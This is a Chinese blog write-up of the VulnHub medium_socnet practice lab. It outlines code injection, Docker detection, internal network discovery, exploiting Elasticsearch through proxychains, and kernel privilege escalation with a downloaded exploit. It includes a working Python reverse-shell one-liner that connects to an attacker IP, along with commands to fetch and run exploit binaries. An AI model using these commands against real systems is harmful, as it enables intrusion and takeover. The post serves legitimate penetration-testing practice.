medium_socnet靶场之代码注入、内网信息收集、内网穿透、Werkzeug协议、本地提权

已于 2023-05-12 09:04:25 修改
阅读量243 收藏
点赞数
文章标签: linux 运维 服务器
于 2023-04-28 15:25:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40898302/article/details/130427012
版权

靶机地址:
https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
主机发现
端口扫描
服务发现
路径爬取
代码注入
Shell脚本
内网信息收集
内网穿透
漏洞利用
密码破解
本地提权
攻击代码修改

Werkzeug协议

基于python语言开发的底层框架

python 反弹shell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.92.128",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

注意:要用bin/sh,用bin/bash会出现无法回显的情况

dock环境发现

1、dockerfile 文件

2、根目录下查看是否有dockerenv文件,如果有就是docker容器

ls /.dockerenv

3、查看dockerhash值

cat /proc/1/cgroup

ping 命令脚本,循环ping

for i in $(seq 1 10); do ping -c 1 129.168.92.$i; done

-c 1 : 发一个包

用python开启http服务

1、进入指定目录输入以下信息

python3 -m http.server 80

9200端口 Elasticsearch服务利用

1、searchsploit 搜索

searchsploit Elasticsearch

查询的路径在

/usr/share/exploitdb/exploits/

例如:/usr/share/exploitdb/exploits/linux/remote/36337.py

2、exp利用获取主机权限

proxychains python2 36337.py 172.17.0.3

查看linux内核版本信息

uname -a

搜索linux内核提权漏洞的利用工具

searchsploit linux 3.13

提权利用

1、使用exp

/usr/share/exploitdb/exploits/linux/local/37292.c

2、编辑exp

删除指定位置代码

3、编译exp

gcc -o exp 37292.c

-o exp #输出exp文件

4、查找ofs-lib.so文件

locate ofs-lib.so

5、启动http服务,目标主机靶机下载exp和ofs-lib.so

python3 -m http.server 80

wget 下载exp和ofs-lib.so

6、移动到/tmp目录

mv * /tmp

7、给权限并执行

chmod +x exp

./exp

白冷
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
socnet-backend
03-19
" socnet-backend "项目是一个基于JavaScript技术构建的后端络应用程序。这个项目的核心目标是创建一个社交络平台的后端基础设施,它负责处理用户交互、数据存储和通信等功能。JavaScript作为主要编程语言,通常...
SocNet:OOPT项目3
07-21
【标题】"SocNet:OOPT项目3" 指的是一个关于社交络的开源项目,该项目可能是OOPT(Object-Oriented Programming Techniques)课程的第三部分实践内容。在这个项目中,开发者可能会学习和应用Java编程语言来构建...
渗透测试--medium_socnet
weixin_44727454的博客
06-09 897
通过对medium_socnet靶机的渗透测试,了解关于内渗透和关于Docker逃逸的知识。通过web层面的代码执行漏洞,执行python反弹shell获取shell。发现是在docker环境中。通过Vemon建立隧道,对内进行主机发现和端口扫描,获取敏感文件找到真实主机的ssh登录用户和密码,最后通过Linux内核获取该靶机的root限。...
sx:快速强大易于使用的现代化络扫描器
m0_59598029的博客
08-02 107
运行速度比Nmap要快30倍;ARP扫描:支持扫描本地络以检测活动设备;ICMP扫描:使用高级ICMP扫描技术来检测活动主机和防火墙规则;TCP SYN扫描:传统半开放扫描以查找开放TCP端口;TCP FIN/NULL/XMAS扫描:扫描某些防火墙绕过技术;自定义TCP扫描:发送任意形式数据包,并获得回复数据包中设置的所有TCP标志的结果;UDP扫描:扫描UDP端口并获取全部ICMP响应,以检测开放端口和防火墙规则;
漏洞靶场实战-Vuluhub medium_socnet
qq_44005305的博客
05-15 808
Vulnhub 是个供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox下载的是一个 ovf 后缀的文件,打开 VirtualBox,导入导入完毕后根据需求编辑虚拟机设置。
【vulhub靶场medium_socnet
今天是几号的博客
03-24 886
显示缺少libstdc++库,尝试能不能 apt-get install libstdc++6 一下,答案是没有限,那么能不能从kali上把该库文件复制过来使用呢?复制过来需要放到/usr/lib/目录下,不然程序无法正常调用,然而该目录是禁止普通用户访问的。Dockerfile 是一个文本文件,其内包含了一条条的指令(Instruction),每一条指令构建一层,因此每一条指令的内容,就是描述该层应当如何构建。服务端连接成功,获取到了一个会话,进入这个会话中,开启一个 socks 代理。
medium_socnet靶场
wcl20010的博客
05-02 2725
1.主机发现 arp-scan -l nmap -p 1-65535 -A 192.168.128.140 发现的22 5000端口 通过服务级别的探测 nmap -p22,5000 -sV 192.168.128.140 2.漏洞发现 发现一个信息:说明服务使用python的脚本编写 Werkzeug httpd 0.14.1 (Python 2.7.15) 知道一个页,发现不到信息尝试进行目录扫描,使用工具dirb或者dirsearch dirsearch -u http://
0x01-medium_socnet
rec09er的博客
04-09 5378
靶机介绍:https://www.vulnhub.com/entry/boredhackerblog-social-network,454/ 靶机下载地址:https://download.vulnhub.com/boredhackerblog/medium_socnet.ova 通关目标:拿下目标靶机的root限 攻击机:kali 目标靶机:medium_socnet 涉及攻击方法: ● 主机发现 ● 端口服务扫描 ● web侦查 ● 目录扫描 ● 代码注入 ● 反弹shell ● 内信息搜集 ● 内
SocNetV-3.0.4-7751bace-windows-installer.zip
01-18
Social Network Visualizer (SocNetV) is a cross-platform, user-friendly free software application for social network analysis and visualization. With SocNetV you can: Draw social networks with a few ...
Group17:社交媒体应用
05-20
第17组-SocNet 带有SocNet临时名称和徽标的Social Networking App 分工 David:主页Fernando:注册/登录 技术领域 我们的团队在Bootstrap和一点CSS中使用了HTML 注册说明 注册页面包含一个主要的div元素和一个表单...
40个神奇国外开放源码WordPress插件设计
08-15
插件之一是可湿性粉剂花哨的消息框,允许你快速的包括各种信息在你的模板或页面内容。它可以包括通过简码 [wpfmb] [wpfmb]。也有一些选项,您可以设置标签上的更新设计。 另一个插件是简单的转换器,它是一个奇怪的...
靶机系列-----medium_socnet
weixin_43993545的博客
05-17 313
靶机系列-----medium_socnet,是一个简单的靶场,可以来尝试一下
medium_socnet穿透靶机(解决5000扫描不到,和虚拟机启动成功问题)
一大口木的博客
09-22 539
我们导入我们下载号的靶机自作聪明,改了一下路径,不知道行不行点击导入这边就有了设置选择跟我一样的然后启动。。。。。上上搜索,去关掉这个然后。。。。打开终端(以管理员身份运行)还不行~直到第二天,他醒我下载最新版,你下载你年份的最新版就行。
medium_socnet
果粒程
11-21 853
vulnhub-medium_socnet靶机打靶过程
hard_socnet2靶场渗透测试
qq_41567985的博客
11-07 150
①先进行简单测试:通过脚本请求了服务端的cpu信息,服务端接受到cpu请求后,通过其API接口执行了客户端的请求,查询到了目标服务器CPU的信息。关于汇编代码简单的说,一个程序在执行中,CPU会给其分配很多内存地址,内存地址中携带了很多指令,程序的处理等,最后再将运算结果输出。直接输入id就能发现我们进入了一个交互式的shell,并且我们的id是0,root限,到此就成功了。从这个add程序的运行来看也不列外,当我在运行这条程序时,首先弹出了欢迎页面,然后在弹出了一些指定的示。
VulnHub打靶记录——Socnet
未完成的歌~的博客
03-04 927
靶机下载地址:https://www.vulnhub.com/entry/boredhackerblog-social-network,454/将靶机设置为NAT模式并启动。
kali之vulhub,medium_socnet
weixin_54431413的博客
05-06 1852
一、部署环境 二、进行主机发现,arp-scan进行扫描 三、使用nmap扫描发现的靶机IP 四、扫目录(dirsearch脚本;和windous御剑类似) 五、跳出docker容器系统隔离环境 六、内穿透 七、对内地址172.17.0.1进行扫描 八、对内地址172.17.0.2进行扫描 九、利用开放的22端口ssh服务 十、 十一、成功拿到宿主机root
Vulnhub-medium_socnet
weixin_46107179的博客
03-27 3731
靶机下载 搭建好靶机环境之后,进行全端口扫描,该靶机开放了22和5000端口 然后进行对端口进行服务扫描,得到一个python环境下搭建的web框架,版本是Werkzeug httpd 0.14.1,Werkzeug是一个WSGI工具包,也可以作为一个Web框架的底层库 然后在浏览器中访问该地址端口,并没有什么可以利用的;然后对隐藏目录进行扫描,得到一个admin目录 然后访问admin目录,得到一个可以执行代码的文本框 简单测试普通代码可以执行代码 接着我们可以在上找一段利用Python代码
【linux/shell】linux如何去除字符串中空格
qq_35902025的博客
07-06 408
linux如何去除字符串中空格 tr命令可以用来替换或删除字符 sed是一个流编辑器,可以用来处理文本
RedHat运维-LinuxSELinux基础4-端口绑定SELinux上下文
最新发布
a15735748145a的博客
07-06 629
12. 将60001/tcp端口上的SELinux上下文由http_port_t调整为gopher_port_t的方法是______________________;13. 将60002/tcp端口上的SELinux上下文由gopher_port_t调整为ssh_port_t的方法是______________________;14. 将60003/tcp端口上的SELinux上下文由ssh_port_t调整为http_port_t的方法是_______________________;

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值